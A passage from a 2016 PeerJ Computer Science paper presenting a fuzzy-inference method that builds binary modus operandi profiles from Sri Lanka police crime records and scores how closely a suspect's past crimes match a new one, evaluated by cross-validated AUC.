60. D. S. McNamara, A. C. Graesser, P. M. McCarthy, and Z. Cai. 2014. Automated evaluation of text and dis- course with Coh-Metrix. Cambridge University Press. G. A. Miller. 1995. WordNet: a lexical database for English. Communication of the ACM, 38(11):39–41. S. Schwarm and M. Ostendorf. 2005. Reading level as- sessment using support vector machines and statistical language models. In Proceedings of ACL, pages 523– 530. A. Vogel and D. Jurafsky. 2010. Learning to follow navigational directions. In Proceedings of ACL, pages 806–814. L. Wang, M. Lui, S. Kim, J. Nivre, and T. Baldwin. 2011. Predicting thread discourse structure over tech- nical web forums. In Proceedings of EMNLP, pages 13–25. 85 86 work_3qibjvwhv5hrzhnlia3sdxdgvq ---- Submitted 21 November 2015 Accepted 12 May 2016 Published 13 June 2016 Corresponding author Mahawaga Arachchige Pathum Chamikara, pathumchamikara@gmail.com Academic editor Sebastian Ventura Additional Information and Declarations can be found on page 27 DOI 10.7717/peerj-cs.65 Copyright 2016 Chamikara et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Fuzzy based binary feature profiling for modus operandi analysis Mahawaga Arachchige Pathum Chamikara1,2, Akalanka Galappaththi1, Roshan Dharshana Yapa1,2, Ruwan Dharshana Nawarathna1,2, Saluka Ranasinghe Kodituwakku1,2, Jagath Gunatilake1,2, Aththanapola Arachchilage Chathranee Anumitha Jayathilake2 and Liwan Liyanage3 1 Postgraduate Institute of Science (PGIS), University of Peradeniya, Peradeniya, Sri Lanka 2 Faculty of Science, University of Peradeniya, Peradeniya, Sri Lanka 3 School of Computing, Engineering and Mathematics, University of Western Sydney, Western Sydney, NSW, Australia ABSTRACT It is a well-known fact that some criminals follow perpetual methods of operations known as modi operandi. Modus operandi is a commonly used term to describe the habits in committing crimes. These modi operandi are used in relating criminals to crimes for which the suspects have not yet been recognized. This paper presents the design, implementation and evaluation of a new method to find connections between crimes and criminals using modi operandi. The method involves generating a feature matrix for a particular criminal based on the flow of events of his/her previous convictions. Then, based on the feature matrix, two representative modi operandi are generated: complete modus operandi and dynamic modus operandi. These two representative modi operandi are compared with the flow of events of the crime at hand, in order to generate two other outputs: completeness probability (CP) and deviation probability (DP). CP and DP are used as inputs to a fuzzy inference system to generate a score which is used in providing a measurement for the similarity between the suspect and the crime at hand. The method was evaluated using actual crime data and ten other open data sets. In addition, comparison with nine other classification algorithms showed that the proposed method performs competitively with other related methods proving that the performance of the new method is at an acceptable level. Subjects Algorithms and Analysis of Algorithms, Artificial Intelligence, Data Mining and Machine Learning Keywords Modus operandi analysis, Fuzzy inference systems, Binary feature analysis, Classification, Association rule mining INTRODUCTION Scientists have long played a role in examining deviant behavior in society. ‘‘Deviance behaviour’’ is a term used by scientists to refer to some form of ‘‘rule-breaking’’ behaviour (Holdaway, 1993). It can be the behaviour of violating a social norm or the law. Criminal behaviour is also a form of deviance, one that is defined as the breaking of legal rules. Nevertheless, there is a difference between deviance and crime. Deviance involves breaking a norm and evoking a negative reaction from others. Crime is a deviance that How to cite this article Chamikara et al. (2016), Fuzzy based binary feature profiling for modus operandi analysis. PeerJ Comput. Sci. 2:e65; DOI 10.7717/peerj-cs.65 https://peerj.com mailto:pathumchamikara@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.65 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.65 breaks a law, which is a norm stipulated and enforced by government bodies (Holdaway, 1993). However, crimes negatively affect society. Therefore, law enforcement authorities take necessary actions to mitigate crimes in an environment where high crime frequencies are observed each year. In this exercise, the application of technology for crime analysis is being widened in the world. Locard’s exchange principle states that every contact of the perpetrators of a crime scene leaves a trace. The perpetrators will both bring something into the scene and leave with something from the scene (Chisum & Turvey, 2000). However, the cognitive abilities of criminals will always make them minimize their risks of apprehension by conducting the perfect crime and maximizing their gain (Paternoster & Bachman, 2001). Modus operandi or method of operation such as preparation actions, crime methods and weapons are frequently used in criminal profiling because the past crime trends show that, after criminals get used to a certain method of operation, they try to use the same modus operandi in committing his/her next crime (Palmiotto, 1988). The criminals develop a set of actions during the performance of a series of crimes which we refer to as ‘‘modus operandi’’ (MO). MO is developed with the crimes he/she commits and the nature of trying to stick with the developed MO that has worked throughout the previous crimes (Douglas & Douglas, 2006). In any criminal career, the MO happens to evolve, no matter what the circumstances. Also, it is a common behaviour that serial offenders tend to exhibit significant behaviour known as his/her signature. Therefore, MOs of criminals play a major role in investigating crimes (Douglas & Douglas, 2006). It is a known fact that features such as criminal signature and physical appearance are used in crime investigations in almost all the police departments around the world. Sri Lanka police also use MOs of criminals to identify the suspects who have conducted crimes. Currently Sri Lanka Police use a manual crime recording and investigation system. This manual system has many problems such as data redundancy, inefficiency, tediousness, inability to support crime investigation and many other problems which are associated with a conventional manual system. To overcome these problems, a web-based framework was proposed with geographical information support containing a centralized database for crime data storage and retrieval, named SL-CIDSS: Sri Lanka Crime Investigation Decision Support System (Chamikara et al., 2015). The proposed system accompanies a collection of data mining algorithms which effectively support the crime investigation process. Fuzzy based binary feature profiling (BFPM) for modus operandi analysis is one novel algorithm which is integrated with the system to provide an effective way to find the similarity between crimes and criminals. According to the penal code of Sri Lanka first enacted in 1882 and amended subsequently several times in later years (The ‘Lectric Law Library, 0000), Sri Lanka police classifies crimes into two categories: Grave crimes and Minor offences. Until 2014, grave crimes were classified under 21 crime categories and in 2015 another 5 new crime categories were introduced, making it 26 categories of grave crime types. Kidnapping, Fraud or mischief causing damage greater than 25,000 rupees, Burglary, Grievous hurt, Hurt by sharp weapon, Homicide, Rape, Robbery, Cheating by trust, Theft are 10 of the most frequent crime types. To identify the patterns involved in crimes, a collection of subtypes were identified under these 26 crime types. These subtypes have been created mainly for the purpose of modus Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 2/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.65 Figure 1 Relationship between main crime type, subtypes and crime flows. operandi analysis. Most frequent behaviors of criminals/crimes are considered as crime subtypes. When a crime is logged in the Grave Crime Record (GCR) book, it is classified under one of the 26 main categories. But, under the section of ‘‘nature of crime’’ in the GCR book, the police officers record the flow of the crime incident including the subtypes. A subtype is a sub category of one of the main crime types. For investigation, the nature of the crime is broken into subtypes and flows according to their frequency of occurrence and uniqueness. These sub categorizations have been introduced mainly to minimize the broadness of main type and to improve clarity. Figure 1 depicts the relationship of the subtypes and flows where there can be a flow of events to a crime recorded as one of the 26 main crime types. For the simplicity and easy handling of data, the investigators have provided subtype codes and flow codes. The flow of events provides a modus operandi which is most of the time unique to an offender. Each subtype is provided with a code under the main type, to make the crime investigation process easier. For example, ROB/S001 denotes a subtype that is Highway robbery; here ROB denotes the main type under which the corresponding subtype appears. In this case, it is Robbery. Crime types are further subdivided into sub types to make the analysis and processing simpler. In this manner, crime subtypes and flows have been identified under all the 26 crime types. The space for adding more subtypes and flows under these crime types exists. A new subtype or a flow is introduced to a particular main crime, if the same subtype or the flow happens to persist for a prolonged time. This paper proposes a novel method of criminal profiling using modus operandi which can be used to identify associations between crimes and criminals. The method is based on a new technique named, ‘‘binary feature vector profiling.’’ Key relationships between a criminal and the previous convictions are analyzed using binary feature profiling and association rule mining techniques. Due to the impreciseness and vagueness of these extracted attributes, a fuzzy inference system is used in making the final decision. The newly proposed method was adapted into a classification algorithm in order to test its accuracy. An actual crime data set was used in testing the performance of the newly proposed method and it was compared against nine well-established classification algorithms using ten open data sets. The results confirmed that the proposed method produce competitive results compared to the other nine classification algorithms. Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 3/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.65 The rest of the paper is organized as follows. The Related work section presents a summary of the work that has been conducted on modus operandi analysis as well as a brief discussion on crime investigation using link analysis and association mining in general. The Materials and Methods section discusses the main steps of the newly proposed algorithm. Next, the Results and Discussion section provides a validation and performance evaluation of the newly proposed method along with a performance comparison with nine other classification algorithms. Finally, some concluding remarks and future enhancements are outlined in the Conclusion section. Related work Literature shows many methods which have been developed in the area of automated crime investigation. Our major concern has been laid upon the research carried out on crime investigation using association mining as our research considers on developing a model to find the associations between the criminals and the crimes depending on the modes operandi. Bennell & Canter (2002) have proposed a method to use statistical models to test directly the police practice of utilizing modus operandi to link crimes to a common offender. The results indicated that certain features such as the distance between burglary locations, lead to high levels of predictive accuracy. Bennell & Jones (2005) have tried to determine if readily available information about commercial and residential serial burglaries, in the form of the offender’s modus operandi, provides a statistically significant basis for accurately linking crimes committed by the same offenders. Leclerc, Proulx & Beauregard (2009) have reviewed the theoretical, empirical, and practical implications related to the modus operandi of sexual offenders against children. They have presented the rational choice perspective in criminology followed by descriptive studies aimed specifically at providing information on modus operandi of sexual offenders against children. Clustering crimes, finding links between crimes, profiling offenders and criminal network detection are some of the common areas where data mining is applied in crime analysis (Oatley & Ewwart, 2011; King & Sutton, 2013; Borg et al., 2014). Association analysis, classification and prediction, cluster analysis, and outlier analysis are some of the traditional data mining techniques which can be used to identify patterns in structured data. Offender profiling is a methodology which is used in profiling unknown criminals or offenders. The purpose of offender profiling is to identify the socio-demographic characteristics of an offender based on information available at the crime scene (Mokros & Alison, 2002; Canter et al., 2013). Association rule mining discovers the items in databases which occur frequently and present them as rules. Since this method is often used in market basket analysis to find which products are bought with what other products, it can also be used to find associated crimes conducted with what other crimes. Here, the rules are mainly evaluated by the two probability measures, support and confidence (Agrawal, Imielinkski & Swami, 1993; Yi et al., 2015). Association rule mining can also be used to identify the environmental factors that affect crimes using the geographical references (Koperski & Han, 1995). Incident association mining and entity association mining are two applications of association rule mining. Incident association mining can be used to find the crimes committed by the same offender and then the unresolved crimes can be linked to find the Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 4/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.65 offender who committed them. Therefore, this technique is normally used to solve serial crimes like serial sexual offenses and serial homicides (Chen, 2006). Similarity-based association mining and outlier-based association mining are two approaches used in incident association mining. Similarity-based association mining is used mainly to compare the features of a crime with the criminal’s behavioral patterns which are referred as modus operandi or behavioral signature. In outlier-based association mining, crime associations will be created on the fact that both the crime and the criminal have the possibility of having some distinctive feature or a deviant behavior (Lin & Brown, 2006). Entity association mining/link analysis is the task of finding and charting associations between crime entities such as persons, weapons, and organizations. The purpose of this technique is to find out how crime entities that appear to be unrelated at the surface, are actually linked to each other (Chen, 2006). Link analysis is also used as one of the most applicable methods in social network analysis (Berry & Linoff, 2011) in finding crime groups, gate keepers and leaders (Chen et al., 2003). Attribution can be used to link crimes to offenders. If two offences in different places involve the same specific type, those may be readily attributed to the same offender (Oatley & Ewwart, 2011).There are three types of link analysis approaches, namely Heuristic-based, Statistical-based and Template-based (Chen, 2006). Sequential pattern mining is also a similar technique to association rule mining. This method discovers frequently occurring items from a set of transactions occurred at different times (Chen et al., 2014). Deviation detection detects data that deviates significantly from the rest of the data which is analyzed. This is also called outlier detection, and is used in fraud detection (Chen et al., 2014; Capozzoli, Lauro & Khan, 2015). In classification, the data points will be assigned to a set of predefined classes of data by identifying a set of common properties among them. This technique is often used to predict crime trends. Classification needs a reasonably complete set of training and testing data since a high degree of missing data would limit the prediction accuracy (Chen et al., 2014). Classification comes under supervised learning method (Chen, 2006; Chikersal, Poria & Cambria, 2015) which includes methods such as Bayesian models, decision trees, artificial neural networks (Chen, 1995) and support vector machines. String comparison techniques are used to detect the similarity between the records. Classification algorithms compare the database record pairs and determine the similarity among them. This concept can be used to avoid deceptive offender profiles. Information of offenders such as name, address, etc. might be deceptive and therefore the crime database might contain multiple records of the same offender. This makes the process of identification of their true identity difficult (Chen et al., 2014). SYSTEMS AND METHODS This section provides a description about the systems and methods used in developing the fuzzy based binary feature profiling for modus operandi analysis. First, an overview about how SL-CIDSS captures the logics of modus operandi is explained. Then a detailed description about the steps of the newly proposed algorithm is explained. Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 5/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.65 Figure 2 Crime flow entity arrangement in SL-CIDSS. Figure 2 shows how SL-CIDSS database captures the crime types and subtypes. A crime record has a crime record flow. Typically, a crime is committed by a criminal and a particular accused might commit one or more crimes. A CRIME RECORD can be of one the 26 crime types. A particular CRIME RECORD will be considered under one main CRIME TYPE with the highest precedence in the order of seriousness. For example, a crime incident that includes a murder and a robbery will be categorized as a murder though a robbery has also taken place. But in the nature of crime section, all crimes followed by the main type will be stated. Therefore, the CRIME RECORD FLOW captures all the steps of the crime as a sequence of steps recorded. The crime flows that have been previously registered are mapped under CRIME FLOW CODE. Also, a particular CRIME RECORD instance can contain multiple SUB TYPES which are recorded as CRIME SUB TYPE. The SPECIAL CATEGORY captures the crimes with special features such as crimes occurring at the same location or retail shop. A crime may involve several special categories which are saved in the CRIME SPECIAL CATEGORY. The ACCUSED entity records the information of suspects and accused and they are related to crime through the CRIME SUSPECT entity. As the first step of the newly employed method, a feature matrix is generated, resulting in a binary matrix representing the crime flows. This binary feature matrix is composed of the binary patterns generated on previous convictions of a particular criminal/suspect. This binary form of the feature matrix provides a provision to direct application of computer algorithms with methods such as Apriori based association rule mining. The reduced complexity of the binary feature matrices provides an easy manipulation over the categorical and continuous valued features. Figure 3 shows the steps of the proposed MO analysis algorithm. Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 6/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.65 Figure 3 Steps of the newly employed algorithm. Generating the feature matrix Table 1 shows how the feature vectors are generated and provides the way to generate modi operandi of criminals as binary sequences. According to the table, events of the crime scene are observed starting from its crime type. After a particular crime type is identified, the feature vectors are updated with ones for each subtype and flow code that is available in the crime or suspect’s modus operandi. The vectors will be filled by zeros in places which the modus operandi does not have any contact with. The column names to the feature matrix are generated in such a way that it covers the collection of main types, sub types, crime flows and special categories at hand. For example, if we consider the list of crime types, subtypes, crime flows and the special category in Table 1, it results in 21-bit feature vectors as shown in the last two columns. In this manner we can produce binary MO patterns based on the crimes committed by different criminals as shown in the last two columns of Table 1. According to Table 1, Sus- pect 1 has committed a robbery with the subtypes, ABD/S003 (an abduction of a child from the legal guardian), ROB/S001 (an organized vehicle robbery) and the flows, ROB/F001 (Identity cards have been shown), ROB/F003 (accused has been wearing uniforms). Suspect 2 has committed a house breaking with the sub type BGL/S004 (use of stealth), and the flows, BGL/F001 (Entering from the window), BGL/F003 (Removing Grills). Table 2 shows a feature matrix of binary patterns which is generated by considering the previous convictions of suspect 1 assuming that he has conducted another robbery (conviction 2). ct, st, fl and sc in Table 2 represent the abbreviations for ‘‘crime type,’’ ‘‘sub type,’’ ‘‘crime flow’’ and ‘‘special category’’ respectively. Generating the dynamic MOs (DMOs) of the criminals Dynamic MO is a binary feature vector which is generated on bit patterns of the feature matrix of a particular criminal. The main purpose of the DMO is to obtain a criminal specific crime flow which captures the crime patterns which are frequently followed by a particular criminal. It is named as the dynamic modus operandi as it is subject to change when the new crime flows are added to the feature matrix. Therefore, this addresses the changing nature Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 7/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.65 Table 1 An instance of feature selection for the feature matrix generation. Main Semantic Crime flow element code Description Suspect 1 Suspect 2 Crime types HB House Breaking 0 1 HK Hurt by Knife 0 0 RB Robbery 1 0 TH Theft 0 0 Sub types ABD/S003 Abduction from the legal guardian 1 0 ABD/S004 Abducting to marry 0 0 ABD/S005 Abducting for sexual harassment 0 0 BGL/S004 Use of stealth 0 1 BGL/S011 Burglary in business places 0 0 ROB/S001 Organized vehicle robbery 1 0 Crime flows BGL/F001 Entering from the window 0 1 BGL/F002 Entering from the Fanlights 0 0 BGL/F003 Removing grills 0 1 BGL/F004 Breaking glasses 0 0 ROB/F001 Showing identity cards 1 0 ROB/F003 Wearing uniforms 1 0 ROB/F004 Robbery using identity cards, uniforms and chains 0 0 ROB/F009 Seizing inmates 0 0 ROB/F010 Appearing as CID officers 0 0 Special category Retailer 1 Attacking/robbing retailer 1’s stores 0 0 Retailer 2 Attacking/robbing retailer 2’s stores 0 0 of the patterns used by the criminals in committing crimes. First, a frequency threshold is generated using characteristic features of the feature matrix at hand which is the matrix of all crimes committed by the same criminal under consideration. The matrix shown in Table 3 is an example to a situation of a feature matrix generated on the previous convictions of a criminal. For the sake of simplicity, let’s consider a feature matrix of 10 columns. If we consider A–J of Table 3 as crime flow features of the corresponding MOs, we can understand that in the first MO the criminal has followed a crime flow of A-E-F-G-I. The same criminal has followed a crime flow of A-D-F-G-I in his second crime. Likewise the other two crime flows are, A-E-F-H-I and A-D-F-G-H-I respectively. The DMO of a particular criminal is generated using the Apriori method (Adamo, 2001). Apriori method is used to find the crime entities with the frequency threshold (frt) which is generated according to Eq. (2). A demonstration of the generation of D in Eq. (1) on the properties of feature matrix is shown in Table 4. D= { d ∣∣∣∣∣d = n∑ i=1 yi } (1) frt =MD/n (2) Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 8/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.65 Table 2 Feature matrix for Suspect 1, generated using the selected modus operandi attributes in Table 1. ct1 ct2 ct3 ct4 st1 st2 st3 st4 st5 st6 fl1 fl2 fl3 fl4 fl5 fl6 fl7 fl8 fl9 sc1 sc2 Conviction 1 0 0 1 0 1 0 0 0 0 1 0 0 0 0 1 1 0 0 0 0 0 Conviction 2 0 0 1 0 1 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 C ham ikara etal. (2016),P eerJ C om put.S ci.,D O I10.7717/peerj-cs.65 9/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.65 Table 3 Feature matrix generated on four previous convictions of a criminal. A B C D E F G H I J 1 0 0 0 1 1 1 0 1 0 1 0 0 1 0 1 1 0 1 0 1 0 0 0 1 1 0 1 1 0 1 0 0 1 0 1 1 1 1 0 Table 4 Column-wise addition of the feature matrix of the suspect under consideration. where, D= vector of distinct column frequencies of the feature matrix. yi = cells in each column, MD = Median of D, n= ∑ f = number of values or total frequencies, c = cumulative frequency of the median class, h= class interval size. The column-wise addition of the matrix shown in Table 4 gives 4, 0, 0, 2, 2, 4, 3, 2, 4 and 0. The distinct numbers are selected from the resulting vector which results in D= [0, 2,3, 4]. The median of D is then divided by the number of instances (rows) in the matrix as the frt, which is 2.5/4 = 0.625 for the above case. Therefore, frt will range from 0 to 1. This value provides an insight to a fair threshold value for the Apriori method to generate the dynamic modus operandi with the most frequent elements. frt is used as the frequency threshold in finding the lengthiest MO with a probability of 0.625 because this value suggests that there is a moderate possibility of one feature having 0.625 probability in each of MO. This results in a dynamic modus operandi (DMO) as shown in Eq. (4), because the only transaction of crime attributes which provides a support of 0.625 is σ(A,F,G,I) as shown in Eq. (3). s= σ(A,F,G,I) |T| = 3 4 =0.75 (3) DMO=[1 0 0 0 0 1 1 0 1 0]. (4) Generating the complete MO profile (CMOP) of the criminals The complete MO profile (CMOP) is obtained by the OR operation between the bits of each column of the feature matrix of the corresponding criminal. CMOP guarantees the provision of a composite crime flow by considering all of the previous crime flow entities of a particular criminal. For example, the complete profile for the feature matrix shown in Table 3 is obtained as shown in Table 5. Therefore, CMOP=[1 0 0 1 1 1 1 1 1 0]. CMOP contains 1s for each place for which a particular crime flow entity has taken place at least once. Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 10/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.65 Table 5 OR operation on the columns to obtain the complete MO profile. Finding the deviation probability (DP) of CMOP from the crime MO under consideration (UMO) First, the deviation of CMOP and UMO is obtained according to Eq. (5). As the binary feature vectors are commonly used to represent patterns, many methods have been invented to find their similarity and distance (Cha, Tappert & Choi, 2010). Euclidean distance, Hamming distance, Manhattan distance, Jaccard, Sorensen and Tanimoto are few of the frequently used measures in that domain (Cha, Tappert & Choi, 2010). This probability value, which is named as the deviation probability (DP), is used to obtain a measurement as to what extent of information is available in the UMO, extra to what is already available in the CMOP of a particular criminal. Let’s assume that the bit pattern to be compared with the suspect’s modus operandi profile under consideration is UMO = [1 0 0 0 1 1 1 0 0 1]. Therefore, DP provides the probability of 1s which are available in UMO but not in CMOP. The deviation probability, DP can be given as, DP= ∑n i=1xi−yi n , for xi=1,yi=0;i=1,2,...,n (5) where, xi=elements of the UMO yi=elements of the CMOP. If we consider the feature matrix on Table 3, Deviation=[1 0 0 0 1 1 1 0 0 1]−[1 0 0 1 1 1 1 1 1 0] Deviation=[0 0 0−1 0 0 0 −1−11]. (6) Define AD=1, where AD is the number of positive 1s. Therefore, DP=1/10=0.1. As it appears in Expression 6, it produces positive 1s for the places with the features available in UMO but not in CMOP. The higher the DP, higher the amount of extra information available in UMO. Hence, a DP value close to 0 indicates the absence of extra features in UMO. Finding the completeness probability (CP) of UMO against DMO For the same feature matrix which was considered in Table 3, the CP is obtained according to (7). Here, the UMO is compared with DMO to obtain a probability to determine what Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 11/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.65 Figure 4 Block diagram of the proposed fuzzy inference system. extent of features in CP is available in UMO. Therefore, it is derived by the percentage of attributes which are present in both UMO and DMO. Let DMO={xi}ni=1 and UMO= { yj }n j=1 be two binary sequences. Define, zk = { 1; xi=yj 0; otherwise Then, CP= ∑n k=1zk n is the completeness probability. (7) For example, if we consider DMO=[ 1 0 0 0 0 1 1 0 1 0], then for the UMO= [1 0 0 0 1 1 1 0 0 1] a CP of 3/10=0.3 is generated as in the 1st, 6th and 7th positions there are ones in both DMO and UMO. The higher the CP value, the more the UMO is composed of crime flow entities which are available in the DMO. Therefore, a CP value close to 1 indicates that the completeness of UMO compared to DMO is 100%. Building a fuzzy inference system to obtain the final similarity score The vagueness of the two measurements CP and DP generates a difficulty in calculating a similarity score using crisp logic. Therefore, the two parameters CP and DP were adapted into a fuzzy inference system which accepts two inputs and provides a score for the similarity between a suspect and a crime. Figure 4 shows a block diagram of the proposed fuzzy inference system. Mamdani fuzzy inference was used as an attempt to solve a control problem by a set of linguistic rules obtained from experienced human operators (Mamdani & Assilina, 1975). First, the rule base of the fuzzy controller was defined by observing the variations of CP and DP. The membership functions of the inputs and outputs were then adjusted in such a way that the parameters which seem to be wrong can be fine-tuned, which is a common practice in defining fuzzy inference systems (Godjevac, 1997). Literature shows many methods used in fine tuning the fuzzy parameters. Usage of adaptive networks (Sun, 1994) and Neuro-fuzzy systems (Abraham, Nath & Mahanti, 2001) in fine tuning the fuzzy parameters have received more attention. The problem at our hand was to generate a fuzzy inference system which generates the highest similarity score when the DP value goes down and CP value goes up. We conducted a manual mapping procedure for the fuzzy membership functions. Therefore, the input and output space of the two inputs CP and DP and the output were partitioned into 3 subsets. Namely, Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 12/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.65 Figure 5 Input fuzzy variable 1: CP. LOW, MODERATE and HIGH. Center of gravity was used as the defuzzification strategy of the fuzzy controller. Mamdani fuzzy inference was especially selected for the similarity score generation procedure, for the highly intuitive knowledge base it offers due to the fact that both antecedents and the consequents of the rules are expressed as linguistic constraints (Zadeh, 1997). First, we selected all of these membership functions with 50% overlap. Then the tuning procedure was conducted during which we adjusted either the left and/or right spread and/or overlapping to get the best possible similarity score for the given DP and CP. This procedure was conducted until the FIS generated satisfactory results. Figures 5 and 6 show the fuzzy inputs of the Fuzzy Inference System (FIS) which correspond to CP and DP values respectively. Figure 7 depicts the fuzzy output of the FIS. As the Figs. 5–7 depict, all the different levels of membership functions under each input and the output are selected to be triangular and trapezoidal functions as triangular or trapezoidal shapes are simple to implement and computationally efficient (MathWorks Inc, 1994–2015). As shown in Fig. 7, the universe of discourse of similarity score (fuzzy output) ranges from 0 to 100. The defuzzified score which is generated from the FIS is considered as the measurement for how close the modus operandi under consideration is to a particular suspect’s profile. A higher score value close to 100 provides a good indication about a high similarity between the modus operandi of the crime and suspect under consideration. The fuzzy rule derivation of the fuzzy controller is heuristic in nature. According to the calculations of the two inputs, higher values of CP, close to 1 and lower values of DP close to 0, positively affect the final similarity score. The rule base of the fuzzy model is generated accordingly. The rule base provides a non-sparse rule composition of 9 combinations as illustrated in Fig. 8. The rule surface of the fuzzy controller depicted in Fig. 9, shows the variation of the similarity score with the changes of the two inputs CP and DP. According to the figure it’s perfectly visible, for higher values of CP (close to 1) and for lower values of DP (close to 0), the fuzzy controller generates higher values for the similarity score which are close to 100. Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 13/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.65 Figure 6 Input fuzzy variable 2: DP. Figure 7 Output fuzzy variable: similarity score. Figure 8 Fuzzy rule set of the rule base of the inference system. Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 14/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.65 Figure 9 Rule surface of the fuzzy controller. Classification of the UMO under the class with the highest similarity score When the algorithm is used to find associations between modi operandi of criminals and modi operandi of crimes, the similarity score which is generated from the newly proposed method can be used directly. A similarity score which is close to 100 would suggest that the criminal has a very high tendency to have committed the crime which is under investigation. Therefore, the similarity scores can be used to classify a particular modus operandi to a most probable suspect with the highest similarity score. The proposed method was developed by using MATLAB 7.12.0 (R2011a) (MathWorks, 1994–2015a). All the necessary implementations were conducted using the MATLAB Script editor (MathWorks, 1994–2015b) apart from the FIS which was implemented using the MATLAB fuzzy toolbox (MathWorks, 1994–2015c). The nine classification algorithms which were used for the performance comparison were classification algorithms which are already packaged with the WEKA 3.6.12 tool (Hall et al., 2009). RESULTS AND DISCUSSION The method was tested with a crime data set obtained from Sri Lanka Police. Figure 10 shows the crime frequencies in Sri Lanka by the crime types from 2005 to 2011. It shows only 21 crime types because the five new crime types were introduced in 2015. 4th column denoting House Breaking and Theft shows the highest number of occurrences. 14: Theft of property, 10: Robbery, 13: Cheating/Misappropriation, 6: Hurt by Knife, 7: Homicide, 8: Rape/Incest, 5: Grievous Hurt, 3: Mischief over Rs. 5,000/=, 1: Abduction/Kidnapping comes next. For the validation of the algorithm, 7 crime types out of these 10 types were selected for the testing data set. They are, House Breaking and Theft, Theft of property, Robbery, Homicide, Rape/Incest, Grievous Hurt, Abduction/Kidnapping. A total of 31 crime flows were selected which are common to the seven selected crime types. The data set is also composed of eight sub types and two special categories. Altogether the data set consisted of 67 instances in which each instance is composed of 48 attribute values. The data set is distributed over 20 classes (criminals). Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 15/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.65 Figure 10 Frequency of different crime types from year 2005–2011. Figure 11 Distribution of modus operandi instances over the classes of the dataset. All the tests were performed in a Windows computer with Intel (R) Core (IM) i7-2670QM CPU of 2.20 GHz and a RAM of 8 GB. The histogram of the instance distribution over the classes is shown in Fig. 11. A 10 fold cross validation (Refaeilzadeh, Tang & Liu, 2009) was used on the data set for a fair testing procedure. In 10-fold cross validation, the data set is divided into 10 subsets, and the holdout method is repeated 10 times. Each time, one of the 10 subsets is used as the test set and the other nine subsets are put together to form a training set. Then the average error across all 10 trials is computed (Refaeilzadeh, Tang & Liu, 2009). The test results of modus operandi classifications in Area Under Curve (AUC) (Hanley & McNeil, 1982), and time elapsed for the classification are shown in Table 6. A Receiver Operating Characteristic (ROC) curve is a two dimensional graphical illustration of the trade-off between the true positive rate (sensitivity) and false positive rate (1-specificity). Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 16/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.65 Table 6 Results returned by the fuzzy based binary feature profiling for the modus operandi analysis on actual data. Data set (number) Oversampling or Under-sampling value AUC Average time elapsed 1 2 0.5417 0.0015 2 3 0.5562 0.0011 3 4 0.5965 0.0014 4 N/A 0.6937 0.0010 5 5 0.6612 0.0011 6 6 0.7063 0.0011 7 10 0.8033 0.0012 8 20 0.9339 0.0013 9 30 0.9661 0.0014 10 40 0.9637 0.0015 11 50 0.9756 0.0016 12 60 0.9626 0.0018 13 70 0.9365 0.0019 14 80 0.9391 0.0023 15 90 0.9671 0.0029 Figure 12 depicts the ROC curve plotted on the classification results obtained by the newly proposed method on the crime data set. In the particular instance which is shown in Fig. 12, all the ROC curves related to the crime data set are plotted well over the diagonal line and all of them have retuned AUC values which are either equal to 1 or very close to 1, providing a very good classification. To prepare the data set which was used under this research, a crime data set of around 3,000 instances was analyzed. Due to the limitations of the real crime data set, it was quite a complex task to prepare a data set with a collection of sufficient modus operandi where each instance has a considerable flow of crime flows. Therefore, only a sample of 67 instances could be filtered from the population to generate a representative data set and it was verified by a domain expert before being used in the analysis. As the number of instances was around 67, it can be considered as an under-represented data sample. Another reason for the data set to become under-represented was the challenge in finding classes/criminals with more than one crime committed. The actual crime data set which is used for the testing purposes is imbalanced as it is apparent in Fig. 11. This imbalanced nature of the data set may produce biased results. To make the classification process unbiased, we used the concept of oversampling. Oversampling and under-sampling are two concepts which are used in overcoming class imbalance problems in input data sets. Oversampling and under-sampling are two different categories of resampling approaches, where in oversampling the small classes are incorporated with repeated instances to make them reach a size close to lager classes, whereas in under-sampling, the number of instances is deceased in such a way that the number of instances reach a size close to the smaller classes (Estabrooks, Jo & Japkowicz, 2004). Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 17/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.65 Figure 12 ROC curves returned by the newly proposed method on the 20 classes of crime data set. Table 6 shows the results returned by the fuzzy based binary feature profiling which was conducted on 